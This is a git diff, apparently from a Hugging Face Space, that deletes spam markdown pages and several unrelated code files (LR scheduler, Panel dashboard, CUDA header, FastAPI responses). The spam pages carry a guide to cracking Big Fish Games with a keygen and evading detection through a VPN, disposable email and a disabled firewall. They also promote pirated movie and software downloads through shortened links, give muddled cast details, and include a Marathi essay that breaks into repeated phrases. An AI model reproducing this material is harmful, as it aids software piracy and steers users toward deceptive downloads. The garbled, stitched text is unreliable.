          Another good source to find and download Big Fish Games keygen is cs.rin.ru forum. This is a forum that focuses on game cracking and modding. They have a thread for Big Fish Games keygen, where you can download the keygen and a modified game client that can bypass the Big Fish Game Manager. You can also find helpful tips and tricks from other users on how to crack Big Fish Games with the keygen.

          -

          How to Avoid Getting Caught Cracking Big Fish Games

          -

          Cracking Big Fish Games with a keygen is illegal and risky. You might get caught by Big Fish Games or by law enforcement agencies if you are not careful. If you want to avoid getting caught cracking Big Fish Games, you should follow some precautions and best practices. For example, you should:

          -
            -
          • Use a VPN service to hide your IP address and location when downloading or using the keygen. This will prevent Big Fish Games or anyone else from tracking your online activity or identity.
          • -
          • Use an antivirus program to scan the keygen and the modified game client before using them. This will ensure that they are free of malware or viruses that might compromise your security or privacy.
          • -
          • Use a sandbox program to run the keygen and the modified game client in an isolated environment. This will prevent them from accessing or modifying any files or settings on your computer.
          • -
          • Use a disposable email address to register or activate your Big Fish account. This will prevent Big Fish Games from linking your account to your real identity or contacting you.
          • -
          -

          How to Play Cracked Big Fish Games

          -

          After you have cracked Big Fish Games with a keygen, you can play them on your computer without any limitations. However, there are some things you need to know before you start playing. For example, you should:

          -
            -
          • Run the game from the modified game client's .exe file that you copied into the game installation folder. This will bypass the Big Fish Game Manager and run the game as a full version.
          • -
          • Disable your internet connection or firewall when playing cracked Big Fish Games. This will prevent Big Fish Games from detecting your cracked games or sending any data to their servers.
          • -
          • Backup your game progress and settings regularly. You might lose your game data if something goes wrong with your cracked games or your computer.
          • -
          • Do not update your cracked games or install any patches. This might break your cracked games or make them revert to trial versions.
          • -
          -

          How to Support Big Fish Games

          -

          Cracking Big Fish Games with a keygen is not a good way to support Big Fish Games and their developers. If you like their games and appreciate their work, you should buy their games legally and enjoy them with all the benefits and features they offer. By supporting Big Fish Games, you can:

          -
            -
          • Get access to updates and support. You can download the latest versions of their games and get help from their customer service if you encounter any problems.
          • -
          • Get access to exclusive content and offers. You can unlock bonus levels, extra modes, achievements, and rewards that are only available for paid customers.
          • -
          • Get access to more games and genres. You can explore their huge catalog of games and find new ones that match your taste and preference.
          • -
          • Show respect and gratitude to Big Fish Games and their developers. You can give them positive feedback, ratings, reviews, and recommendations that will help them improve their games and create more amazing ones.
          • -
          -

          Conclusion

          -

          In this article, we have shown you how to crack Big Fish Games with a keygen. This is a simple and effective way to enjoy casual games without paying for them. However, we do not encourage piracy or illegal activities. Cracking Big Fish Games with a keygen is illegal and risky. It violates the terms of service and the copyright of Big Fish Games and their developers. It also deprives them of their rightful income and recognition for their hard work and creativity.

          -

          If you want to play Big Fish Games without cracking them with a keygen, you have some alternatives that are legal and safe. You can play the free trial versions, wait for discounts and sales, use coupons and promo codes, or join the Big Fish Game Club. These options will allow you to enjoy Big Fish Games with all the benefits and features they offer.

          -

          If you like Big Fish Games and appreciate their work, you should support them by buying their games legally and enjoying them with all the benefits and features they offer. By supporting Big Fish Games, you can get access to updates and support, exclusive content and offers, more games and genres, and show respect and gratitude to Big Fish Games and their developers.

          -

          We hope this article has been helpful and informative for you. Thank you for reading and happy gaming!

          3cee63e6c2
          -
          -
          \ No newline at end of file diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/BulletProof FTP Download [BETTER] Pc.md b/spaces/inplisQlawa/anything-midjourney-v4-1/BulletProof FTP Download [BETTER] Pc.md deleted file mode 100644 index 61b55cea6e51e495da649d34aef20c5cba502bb8..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/BulletProof FTP Download [BETTER] Pc.md +++ /dev/null @@ -1,6 +0,0 @@ -

          BulletProof FTP download pc


          DOWNLOAD ✏ ✏ ✏ https://urlin.us/2uEww3



          -
          -Shareware [?] Operating Systems: Windows 2000 Windows XP Windows 2003 Server. Release Status: update (2019 ... 1fdad05405
          -
          -
          -

          diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/Download Kamaal Dhamaal Malamaal Man Movie In Hindi 720p.md b/spaces/inplisQlawa/anything-midjourney-v4-1/Download Kamaal Dhamaal Malamaal Man Movie In Hindi 720p.md deleted file mode 100644 index 1078f05bac65b0061e27ccfea16398c508d95877..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/Download Kamaal Dhamaal Malamaal Man Movie In Hindi 720p.md +++ /dev/null @@ -1,116 +0,0 @@ - -

          How to Download Kamaal Dhamaal Malamaal Man Movie in Hindi 720p

          - -

          If you are looking for a comedy movie that will make you laugh out loud, you should check out Kamaal Dhamaal Malamaal. This is a 2012 Hindi movie directed by Priyadarshan and starring Nana Patekar, Shreyas Talpade, Paresh Rawal, Madhurima Banerjee and others. The movie is about Jhonny, a lazy and good-for-nothing man who is often fooled by the villagers. His life changes when a mysterious man named Bakri arrives in the village and claims to be his long-lost brother. Jhonny soon realizes that Bakri is not what he seems and has a hidden agenda. What follows is a series of hilarious events and misunderstandings that will keep you entertained throughout.

          - -

          If you want to watch Kamaal Dhamaal Malamaal, you can download it from various online sources. However, you need to be careful and choose a reliable and safe site that offers high-quality video and audio. You also need to make sure that the file size and format are compatible with your device and player. In this article, we will show you how to download Kamaal Dhamaal Malamaal man movie in Hindi 720p.

          -

          download Kamaal Dhamaal Malamaal man movie in hindi 720p


          Downloadhttps://urlin.us/2uEy3y



          - -

          Why Download Kamaal Dhamaal Malamaal Man Movie in Hindi 720p?

          - -

          There are many reasons why you should download Kamaal Dhamaal Malamaal man movie in Hindi 720p. Here are some of them:

          - -
            -
          • You can enjoy the movie in high-definition quality with clear picture and sound.
          • -
          • You can save the movie on your device and watch it anytime and anywhere without internet connection.
          • -
          • You can avoid ads, pop-ups and malware that may interrupt your viewing experience or harm your device.
          • -
          • You can share the movie with your friends and family easily.
          • -
          - -

          Downloading Kamaal Dhamaal Malamaal man movie in Hindi 720p is easy and fast if you follow the right steps.

          - -

          How to Download Kamaal Dhamaal Malamaal Man Movie in Hindi 720p?

          - -

          To download Kamaal Dhamaal Malamaal man movie in Hindi 720p, you need to follow these steps:

          - -
            -
          1. Find a trustworthy site that offers Kamaal Dhamaal Malamaal man movie in Hindi 720p. You can use a search engine or a review site to find such sites. Some of the popular sites are SSRMovies, TorrentMoviesInIDM and Askmemetallurgy.
          2. -
          3. Visit the site and search for Kamaal Dhamaal Malamaal man movie in Hindi 720p. You will see a list of results with different file sizes and formats. Choose the one that suits your preferences and click on it.
          4. -
          5. You will be redirected to a download page where you will see a download link or button. Click on it and wait for the download to start. You may need to complete some verification steps or surveys before the download begins.
          6. -
          7. Once the download is complete, you will have the Kamaal Dhamaal Malamaal man movie in Hindi 720p file on your device. You can open it with any compatible media player and enjoy the movie.
          8. -
          - -

          Note: Downloading Kamaal Dhamaal Malamaal man movie in Hindi 720p may be illegal in some countries or regions. You should check the laws and regulations of your location before downloading any copyrighted content. You should also use a VPN or proxy service to protect your privacy and security online.

          - -

          Conclusion

          - -

          Kamaal Dhamaal Malamaal is a comedy movie that will make you laugh out loud with its funny plot and characters. You can download Kamaal Dhamaal Malamaal man movie in Hindi 720p from various online sources if you want to watch it in high-quality video and audio. You just need to find a reliable and safe site that offers the movie in the desired file size and format. You also need to follow some simple steps to download the movie on your device. By downloading Kamaal Dhamaal Malamaal man movie in Hindi 720p, you can enjoy the movie anytime and anywhere without any hassle.

          -

          What are the Reviews of Kamaal Dhamaal Malamaal Man Movie in Hindi 720p?

          - -

          Kamaal Dhamaal Malamaal man movie in Hindi 720p has received mixed reviews from critics and audiences. Some have praised the movie for its comedy and entertainment value, while others have criticized it for its weak plot and direction. Here are some of the reviews of Kamaal Dhamaal Malamaal man movie in Hindi 720p:

          - -
            -
          • Taran Adarsh of Bollywood Hungama gave the movie 2 out of 5 stars and wrote, "KAMAAL DHAMAAL MALAMAAL is a big letdown from the accomplished director. It's not funny, it's not engaging, it's not entertaining. It's a damp squib!"
          • -
          • Rajeev Masand of CNN-IBN gave the movie 1 out of 5 stars and wrote, "Kamaal Dhamaal Malamaal is so dull and humorless that it makes you long for a Priyadarshan comedy like De Dana Dan or Bhagam Bhag. Yes, it's that bad."
          • -
          • Sukanya Verma of Rediff gave the movie 2 out of 5 stars and wrote, "Kamaal Dhamaal Malamaal is a harmless comedy that doesn't make you laugh much but doesn't annoy you either. It's just there."
          • -
          • Shubhra Gupta of The Indian Express gave the movie 1.5 out of 5 stars and wrote, "Kamaal Dhamaal Malamaal is a sorry mess, with nothing to recommend it."
          • -
          • Anupama Chopra of Hindustan Times gave the movie 1.5 out of 5 stars and wrote, "Kamaal Dhamaal Malamaal is a film that makes you wonder why it was made. It's not funny or engaging or remotely interesting."
          • -
          - -

          As you can see, Kamaal Dhamaal Malamaal man movie in Hindi 720p has not received much appreciation from the critics or the viewers. However, if you are a fan of Priyadarshan or Nana Patekar, you may still enjoy the movie for its comedy scenes and dialogues.

          - -

          How to Watch Kamaal Dhamaal Malamaal Man Movie in Hindi 720p Online?

          - -

          If you don't want to download Kamaal Dhamaal Malamaal man movie in Hindi 720p, you can also watch it online on various streaming platforms. However, you need to have a good internet connection and a subscription to access these platforms. You also need to be careful of illegal or pirated sites that may harm your device or expose your personal information.

          -

          - -

          Some of the legal and safe platforms where you can watch Kamaal Dhamaal Malamaal man movie in Hindi 720p online are:

          - -
            -
          • Amazon Prime Video: This is a popular streaming service that offers a wide range of movies and shows in various languages and genres. You can watch Kamaal Dhamaal Malamaal man movie in Hindi 720p online on Amazon Prime Video with a monthly or yearly subscription.
          • -
          • Hotstar: This is another popular streaming service that offers movies, shows, sports and news in various languages and genres. You can watch Kamaal Dhamaal Malamaal man movie in Hindi 720p online on Hotstar with a monthly or yearly subscription.
          • -
          • Zee5: This is a streaming service that offers movies, shows, music and live TV in various languages and genres. You can watch Kamaal Dhamaal Malamaal man movie in Hindi 720p online on Zee5 with a monthly or yearly subscription.
          • -
          - -

          By watching Kamaal Dhamaal Malamaal man movie in Hindi 720p online, you can enjoy the movie without any hassle or risk.

          -

          What is the Plot of Kamaal Dhamaal Malamaal Man Movie in Hindi 720p?

          - -

          Kamaal Dhamaal Malamaal man movie in Hindi 720p is a comedy movie that revolves around the life of Jhonny, a lazy and good-for-nothing man who lives in a village with his father Peter. Jhonny is often fooled by the villagers as he is fit for nothing. He is in love with Maria, the daughter of the village headman David, but he has no courage to propose to her. His life changes when a mysterious man named Bakri arrives in the village and claims to be his long-lost brother. Bakri is a smart and strong man who impresses everyone with his skills and abilities. He also helps Jhonny to win Maria's heart and to stand up against the villagers. However, Jhonny soon realizes that Bakri is not what he seems and has a hidden agenda. He is actually a wanted criminal who has come to the village to hide from his enemies and to loot the villagers. Jhonny has to decide whether to support his brother or to expose his truth.

          - -

          Who are the Cast and Crew of Kamaal Dhamaal Malamaal Man Movie in Hindi 720p?

          - -

          Kamaal Dhamaal Malamaal man movie in Hindi 720p is directed by Priyadarshan, who is a famous filmmaker known for his comedy movies such as Hera Pheri, Hungama, Bhool Bhulaiyaa and others. The movie is written by Neeraj Vora, who is also a renowned writer and actor. The movie is produced by Percept Picture Company and features a star-studded cast of actors such as:

          - -
            -
          • Nana Patekar as Bakri: He is the main protagonist of the movie who plays the role of Jhonny's brother and a wanted criminal.
          • -
          • Shreyas Talpade as Jhonny: He is the main antagonist of the movie who plays the role of Bakri's brother and a lazy and good-for-nothing man.
          • -
          • Paresh Rawal as Peter: He is Jhonny's father who is also a lazy and good-for-nothing man.
          • -
          • Madhurima Banerjee as Maria: She is Jhonny's love interest and David's daughter.
          • -
          • Om Puri as David: He is Maria's father and the village headman.
          • -
          • Asrani as Kallu: He is Jhonny's friend who is also a lazy and good-for-nothing man.
          • -
          • Shakti Kapoor as Sam: He is Bakri's enemy who wants to kill him.
          • -
          - -

          Kamaal Dhamaal Malamaal man movie in Hindi 720p also features other actors such as Anjana Sukhani, Neeraj Vora, Rajpal Yadav, Pratima Kazmi and others in supporting roles.

          -

          What are the Benefits of Downloading Kamaal Dhamaal Malamaal Man Movie in Hindi 720p?

          - -

          Downloading Kamaal Dhamaal Malamaal man movie in Hindi 720p has many benefits that you can enjoy. Here are some of them:

          - -
            -
          • You can save money and time by downloading the movie instead of buying or renting it from a store or an online platform.
          • -
          • You can watch the movie at your own convenience and comfort without any interruptions or distractions.
          • -
          • You can choose the quality and format of the movie according to your device and player specifications.
          • -
          • You can have a backup of the movie on your device in case you lose or damage the original source.
          • -
          • You can share the movie with your friends and family easily by transferring it to their devices or using a USB drive or a cloud service.
          • -
          - -

          Downloading Kamaal Dhamaal Malamaal man movie in Hindi 720p is a smart and easy way to enjoy this comedy movie.

          - -

          What are the Risks of Downloading Kamaal Dhamaal Malamaal Man Movie in Hindi 720p?

          - -

          Downloading Kamaal Dhamaal Malamaal man movie in Hindi 720p also has some risks that you should be aware of. Here are some of them:

          - -
            -
          • You may violate the copyright laws and regulations of your country or region by downloading the movie without permission or authorization from the owners or creators.
          • -
          • You may face legal actions or penalties such as fines, lawsuits or imprisonment for downloading the movie illegally.
          • -
          • You may harm your device or expose your personal information by downloading the movie from untrustworthy or malicious sites that may contain viruses, malware or spyware.
          • -
          • You may compromise your privacy and security by downloading the movie without using a VPN or proxy service that can hide your IP address and encrypt your data.
          • -
          • You may get low-quality or corrupted files that may not play properly or damage your device or player.
          • -
          - -

          Downloading Kamaal Dhamaal Malamaal man movie in Hindi 720p is a risky and dangerous activity that you should avoid or minimize.

          -

          Conclusion

          - -

          Kamaal Dhamaal Malamaal is a comedy movie that will make you laugh out loud with its funny plot and characters. You can download Kamaal Dhamaal Malamaal man movie in Hindi 720p from various online sources if you want to watch it in high-quality video and audio. You just need to find a reliable and safe site that offers the movie in the desired file size and format. You also need to follow some simple steps to download the movie on your device. However, you should also be careful of the risks and consequences of downloading the movie illegally or from untrustworthy sites. You should always respect the rights and efforts of the owners and creators of the movie and use a VPN or proxy service to protect your privacy and security online. By downloading Kamaal Dhamaal Malamaal man movie in Hindi 720p, you can enjoy this comedy movie anytime and anywhere without any hassle or risk.

          3cee63e6c2
          -
          -
          \ No newline at end of file diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/Icad Sx Mechanical Pro Crack.md b/spaces/inplisQlawa/anything-midjourney-v4-1/Icad Sx Mechanical Pro Crack.md deleted file mode 100644 index 6676fedb06da16fb5445d0f96bd4d0222437995a..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/Icad Sx Mechanical Pro Crack.md +++ /dev/null @@ -1,6 +0,0 @@ -

          icad sx mechanical pro crack


          DOWNLOADhttps://urlin.us/2uExuU



          -
          -Latest crack software ftp download can mail to ***@list.ru. Latest crack ... Pro.v8.2. Nikon Capture NX 2. NIST.EPA.NIH.Mass.Spectral.Library.05.and.AMDIS.iSO ... ICAD/SX.Mechanical.V6L1 ICCV7 for AVR v7.19. ICAM.CAMPost.v18. ICAM. 1fdad05405
          -
          -
          -

          diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/Mazi Shala Marathi Nibandh Pdf 38.md b/spaces/inplisQlawa/anything-midjourney-v4-1/Mazi Shala Marathi Nibandh Pdf 38.md deleted file mode 100644 index 646d67c246beec898b3e8d99e7b599b316bbb0ba..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/Mazi Shala Marathi Nibandh Pdf 38.md +++ /dev/null @@ -1,13 +0,0 @@ - -

          माझी शाळा निबंध मराठी | Majhi Shala Nibandh (400 शब्द)

          -

          माझ्या शाळेचे नाव कस्तुरबा माध्यमिक विद्यालय आहे. माझी शाळा साताऱ्यात आहे, शाळेच्या खूप मोठ्या परिसरात. शाळेची इमारत ३ मजली आहे. प्रत्येक मजल्यावर ८ वर्गखोल्या आहेत. शाळेत १००० पेक्षा जास्त विद्यार्थी शिकत असतात. माझी शाळा मुख्यरूपे हिंदी माध्यमीची आहे, पण मराठी, उर्दू, संस्कृत, इंग्रजी हे पण संकलनप्रक्रिया आहेत.

          -

          mazi shala marathi nibandh pdf 38


          Download Zip ===> https://urlin.us/2uEyK0



          -

          माझी शाळा मला केवळ पुस्तके वाचणे किंवा परीक्षेमध्ये सर्वोत्कृष्ट करणे हे संपूर्ण कुसलते समजतो. मला हे सुद्धा समजतो कि मला कसे समुपदेशन करावे, कसे संस्कृतीने संपर्क करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे. मला हि सर्व गोष्टी माझी शाळा मुळे मिळतील हि मला पूर्णपणे प्रतिबंधित होतो.

          -

          मला मनोरंजन होतो. मला प्रतिभा प्रकट करण्यास मिळतो. मला प्रतिभा प्रकट करण्यास मिळतो. मला प्रतिभा प्रकट करण्यास मिळतो. मला प्रतिभा प्रकट करण्यास मिळतो. मला प्रतिभा प्रकट करण्यास मिळतो. मला प्रतिभा प्रकट करण्यास मिळतो. मला प्रतिभा प्रकट करण्यास मिळ - -

          माझी शाळा मला केवळ पुस्तके वाचणे किंवा परीक्षेमध्ये सर्वोत्कृष्ट करणे हे संपूर्ण कुसलते समजतो. मला हे सुद्धा समजतो कि मला कसे समुपदेशन करावे, कसे संस्कृतीने संपर्क करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे, कसे समुपक्रम करावे. मला हि सर्व गोष्टी माझी शाळा मुळे मिळतील हि मला पूर्णपणे प्रतिबंधित होतो.

          -

          मला मनोरंजन होतो. मला प्रतिभा प्रकट करण्यास मिळतो. मला गाणी गायला, नृत्य करण्यास, चित्रकलेत आपली भाषा बोलण्यास आणि लेखन करण्यास मिळतो. मला शाळेतील अनेक स्पर्धांमध्ये भाग घेण्याची परवानगी मिळते. मला शिक्षक-विद्यार्थी-पालक-संपर्क-संस्था (SSP) ची सभा आणि शिक्षक-विद्यार्थी-प्रतिनिधी-संस्था (SSR) ची सभा आणि शिक्षक-विद्यार्थी-प्रतिनिधी-संस्था (SSR) ची सभा हि मनोरंजनाची होती. मला हि सर्व गोष्टी मनोरंजनाची होती.

          -

          मला प्रेम होतो. मला माझी शाळा प्रेम होत. मला माझे शिक्षक प्रेम होत. मला माझे मित्र प्रेम होत. मला माझी पुस्तके प्रेम होत. मला माझी पुस्तके प्रेम होत. मला माझी पुस्तके प्रेम होत. मला माझी पुस्तके प्रेम होत. मला माझी पुस्तक

          -

          d5da3c52bf
          -
          -
          \ No newline at end of file diff --git a/spaces/ismot/1702t1/models/other/scheduler.py b/spaces/ismot/1702t1/models/other/scheduler.py deleted file mode 100644 index 27d93bc4a6f72059d5e00e6589bc1715f5452aab..0000000000000000000000000000000000000000 --- a/spaces/ismot/1702t1/models/other/scheduler.py +++ /dev/null @@ -1,51 +0,0 @@ -""" -@Date: 2021/09/14 -@description: -""" - - -class WarmupScheduler: - def __init__(self, optimizer, lr_pow, init_lr, warmup_lr, warmup_step, max_step, **kwargs): - self.lr_pow = lr_pow - self.init_lr = init_lr - self.running_lr = init_lr - self.warmup_lr = warmup_lr - self.warmup_step = warmup_step - self.max_step = max_step - self.optimizer = optimizer - - def step_update(self, cur_step): - if cur_step < self.warmup_step: - frac = cur_step / self.warmup_step - step = self.warmup_lr - self.init_lr - self.running_lr = self.init_lr + step * frac - else: - frac = (float(cur_step) - self.warmup_step) / (self.max_step - self.warmup_step) - scale_running_lr = max((1. - frac), 0.) ** self.lr_pow - self.running_lr = self.warmup_lr * scale_running_lr - - if self.optimizer is not None: - for param_group in self.optimizer.param_groups: - param_group['lr'] = self.running_lr - - -if __name__ == '__main__': - import matplotlib.pyplot as plt - - scheduler = WarmupScheduler(optimizer=None, - lr_pow=4, - init_lr=0.0000003, - warmup_lr=0.00003, - warmup_step=10000, - max_step=100000) - - x = [] - y = [] - for i in range(100000): - if i == 10000-1: - print() - scheduler.step_update(i) - x.append(i) - y.append(scheduler.running_lr) - plt.plot(x, y, linewidth=1) - plt.show() diff --git a/spaces/ivn888/Twitter-dashboard/panel-geodashboard-twitter/geotwitter_analysis.py b/spaces/ivn888/Twitter-dashboard/panel-geodashboard-twitter/geotwitter_analysis.py deleted file mode 100644 index e4d359ff14625ad1336139d8667f36bac3e7249f..0000000000000000000000000000000000000000 --- a/spaces/ivn888/Twitter-dashboard/panel-geodashboard-twitter/geotwitter_analysis.py +++ /dev/null @@ -1,126 +0,0 @@ -import holoviews as hv -import panel as pn -from graphs.bar_plots import get_top5_langs -from graphs.hashtags_plot import get_top10_hashtags -from graphs.line_plots import get_daily_tweets, get_daily_unique_users -from graphs.sentiment_plots import get_overall_sentiment -from graphs.tweet_map import get_tweet_map, get_tweet_points -from holoviews import streams -from pd_utils.utils import filter_df_by_bbox, get_hashtags_df, load_data - -# Load the bokeh extension -hv.extension("bokeh") - -# Disable webgl: https://github.com/holoviz/panel/issues/4855 -hv.renderer("bokeh").webgl = False # Disable Webgl - -pn.extension("echarts", notifications=True) - - -def show_nodata_message(x_range, y_range): - """ - Displays a notification if no data is found - """ - - out_data = filter_df_by_bbox(twitter_data, x_range, y_range) - if len(out_data) == 0: - # FIXME: Notifications are not working - # pn.state.notifications.warning("No data to display 🙁", duration=4000) - pass - - -# Twitter logo -TWITTER_LOGO = "https://huggingface.co/spaces/ivn888/Twitter-dashboard/resolve/main/panel-geodashboard-twitter/assets/images/Twitter-logo.svg" - -# Input Twitter data -IN_TWITTER_DATA = "https://huggingface.co/spaces/ivn888/Twitter-dashboard/resolve/main/panel-geodashboard-twitter/data/rome_tweets.parquet" - - -# Load tweet locations and hashtags as a DataFrame -twitter_data = load_data(IN_TWITTER_DATA) - -# Load tweet hashtags as a DataFrame -hashtags_data = get_hashtags_df(twitter_data) - -# Get a rasterized point plot showing the tweet locations -tweets_pts = get_tweet_points(twitter_data) - -# Define a RangeXY stream linked to the tweet locations -range_xy = streams.RangeXY(source=tweets_pts) -range_xy.add_subscriber(show_nodata_message) - -# Get the tweet map -tweet_map = get_tweet_map(tweets_pts) - -# Top 5 languages -top5_languages = hv.DynamicMap( - pn.bind( - get_top5_langs, - in_data=twitter_data, - x_range=range_xy.param.x_range, - y_range=range_xy.param.y_range, - ) -) - -# Overall Sentiment -overall_sentiment = pn.bind( - get_overall_sentiment, - in_data=twitter_data, - x_range=range_xy.param.x_range, - y_range=range_xy.param.y_range, -) - -# Top 10 hashtags - wordcloud image -top10_hashtags = pn.bind( - get_top10_hashtags, - in_data=hashtags_data, - x_range=range_xy.param.x_range, - y_range=range_xy.param.y_range, -) - -# Number of tweets (daily) -tweets_daily = hv.DynamicMap( - pn.bind( - get_daily_tweets, - in_data=twitter_data, - x_range=range_xy.param.x_range, - y_range=range_xy.param.y_range, - ) -) - -# Number of unique users (daily) -unique_users_daily = hv.DynamicMap( - pn.bind( - get_daily_unique_users, - in_data=twitter_data, - x_range=range_xy.param.x_range, - y_range=range_xy.param.y_range, - ) -) - -# Second tab - Top 5 Languages, Top 10 Hashtags -top5_10_tabs = pn.Tabs( - ("Top 5 Languages", top5_languages), - ("Top 10 Hashtags", top10_hashtags), - ("Overall sentiment", overall_sentiment), -) - -# Third tab - Daily data (Tweets, Unique users) -daily_plots_tabs = pn.Tabs( - ("Tweets", tweets_daily), - ("Unique Users", unique_users_daily), -) - -# Compose the layout -layout = pn.Column(pn.Row(tweet_map, top5_10_tabs), daily_plots_tabs) - -# Create the dashboard and turn into a deployable application -twitter_geodashboad = pn.template.FastListTemplate( - site="", - title="Twitter Dashboard - Rome (2018)", - theme="dark", - theme_toggle=False, - logo=TWITTER_LOGO, - main=[layout], - modal=[pn.Row()], -).servable() diff --git a/spaces/james-oldfield/PandA/networks/stylegan3/torch_utils/ops/upfirdn2d.h b/spaces/james-oldfield/PandA/networks/stylegan3/torch_utils/ops/upfirdn2d.h deleted file mode 100644 index 2793daf874492af01e8634a7863c036e17b6731f..0000000000000000000000000000000000000000 --- a/spaces/james-oldfield/PandA/networks/stylegan3/torch_utils/ops/upfirdn2d.h +++ /dev/null @@ -1,59 +0,0 @@ -// Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. -// -// NVIDIA CORPORATION and its licensors retain all intellectual property -// and proprietary rights in and to this software, related documentation -// and any modifications thereto. Any use, reproduction, disclosure or -// distribution of this software and related documentation without an express -// license agreement from NVIDIA CORPORATION is strictly prohibited. - -#include - -//------------------------------------------------------------------------ -// CUDA kernel parameters. - -struct upfirdn2d_kernel_params -{ - const void* x; - const float* f; - void* y; - - int2 up; - int2 down; - int2 pad0; - int flip; - float gain; - - int4 inSize; // [width, height, channel, batch] - int4 inStride; - int2 filterSize; // [width, height] - int2 filterStride; - int4 outSize; // [width, height, channel, batch] - int4 outStride; - int sizeMinor; - int sizeMajor; - - int loopMinor; - int loopMajor; - int loopX; - int launchMinor; - int launchMajor; -}; - -//------------------------------------------------------------------------ -// CUDA kernel specialization. - -struct upfirdn2d_kernel_spec -{ - void* kernel; - int tileOutW; - int tileOutH; - int loopMinor; - int loopX; -}; - -//------------------------------------------------------------------------ -// CUDA kernel selection. - -template upfirdn2d_kernel_spec choose_upfirdn2d_kernel(const upfirdn2d_kernel_params& p); - -//------------------------------------------------------------------------ diff --git a/spaces/jason9693/Soongsil-Bot-KoGPT/README.md b/spaces/jason9693/Soongsil-Bot-KoGPT/README.md deleted file mode 100644 index d5ba744c71ac757bc28cf1f76b003848a1ac8a13..0000000000000000000000000000000000000000 --- a/spaces/jason9693/Soongsil-Bot-KoGPT/README.md +++ /dev/null @@ -1,37 +0,0 @@ ---- -title: Soongsil Bot KoGPT -emoji: 🏃 -colorFrom: purple -colorTo: purple -sdk: streamlit -app_file: app.py -pinned: false ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio` or `streamlit` - -`sdk_version` : _string_ -Only applicable for `streamlit` SDK. -See [doc](https://hf.co/docs/hub/spaces) for more info on supported versions. - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. diff --git a/spaces/jgurzoni/image_background_swapper/models/ade20k/segm_lib/utils/th.py b/spaces/jgurzoni/image_background_swapper/models/ade20k/segm_lib/utils/th.py deleted file mode 100644 index ca6ef9385e3b5c0a439579d3fd7aa73b5dc62758..0000000000000000000000000000000000000000 --- a/spaces/jgurzoni/image_background_swapper/models/ade20k/segm_lib/utils/th.py +++ /dev/null @@ -1,41 +0,0 @@ -import torch -from torch.autograd import Variable -import numpy as np -import collections - -__all__ = ['as_variable', 'as_numpy', 'mark_volatile'] - -def as_variable(obj): - if isinstance(obj, Variable): - return obj - if isinstance(obj, collections.Sequence): - return [as_variable(v) for v in obj] - elif isinstance(obj, collections.Mapping): - return {k: as_variable(v) for k, v in obj.items()} - else: - return Variable(obj) - -def as_numpy(obj): - if isinstance(obj, collections.Sequence): - return [as_numpy(v) for v in obj] - elif isinstance(obj, collections.Mapping): - return {k: as_numpy(v) for k, v in obj.items()} - elif isinstance(obj, Variable): - return obj.data.cpu().numpy() - elif torch.is_tensor(obj): - return obj.cpu().numpy() - else: - return np.array(obj) - -def mark_volatile(obj): - if torch.is_tensor(obj): - obj = Variable(obj) - if isinstance(obj, Variable): - obj.no_grad = True - return obj - elif isinstance(obj, collections.Mapping): - return {k: mark_volatile(o) for k, o in obj.items()} - elif isinstance(obj, collections.Sequence): - return [mark_volatile(o) for o in obj] - else: - return obj diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fastapi/responses.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fastapi/responses.py deleted file mode 100644 index c0a13b7555efc9d99c5c887fee1c94c88ba7e89c..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fastapi/responses.py +++ /dev/null @@ -1,34 +0,0 @@ -from typing import Any - -from starlette.responses import FileResponse as FileResponse # noqa -from starlette.responses import HTMLResponse as HTMLResponse # noqa -from starlette.responses import JSONResponse as JSONResponse # noqa -from starlette.responses import PlainTextResponse as PlainTextResponse # noqa -from starlette.responses import RedirectResponse as RedirectResponse # noqa -from starlette.responses import Response as Response # noqa -from starlette.responses import StreamingResponse as StreamingResponse # noqa - -try: - import ujson -except ImportError: # pragma: nocover - ujson = None # type: ignore - - -try: - import orjson -except ImportError: # pragma: nocover - orjson = None # type: ignore - - -class UJSONResponse(JSONResponse): - def render(self, content: Any) -> bytes: - assert ujson is not None, "ujson must be installed to use UJSONResponse" - return ujson.dumps(content, ensure_ascii=False).encode("utf-8") - - -class ORJSONResponse(JSONResponse): - def render(self, content: Any) -> bytes: - assert orjson is not None, "orjson must be installed to use ORJSONResponse" - return orjson.dumps( - content, option=orjson.OPT_NON_STR_KEYS | orjson.OPT_SERIALIZE_NUMPY - ) diff --git a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fontTools/ufoLib/glifLib.py b/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fontTools/ufoLib/glifLib.py deleted file mode 100644 index 6dee9db302f51525b69d3d28fcd704be8cce2212..0000000000000000000000000000000000000000 --- a/spaces/joaopereirajp/livvieChatBot/venv/lib/python3.9/site-packages/fontTools/ufoLib/glifLib.py +++ /dev/null @@ -1,2017 +0,0 @@ -""" -glifLib.py -- Generic module for reading and writing the .glif format. - -More info about the .glif format (GLyphInterchangeFormat) can be found here: - - http://unifiedfontobject.org - -The main class in this module is 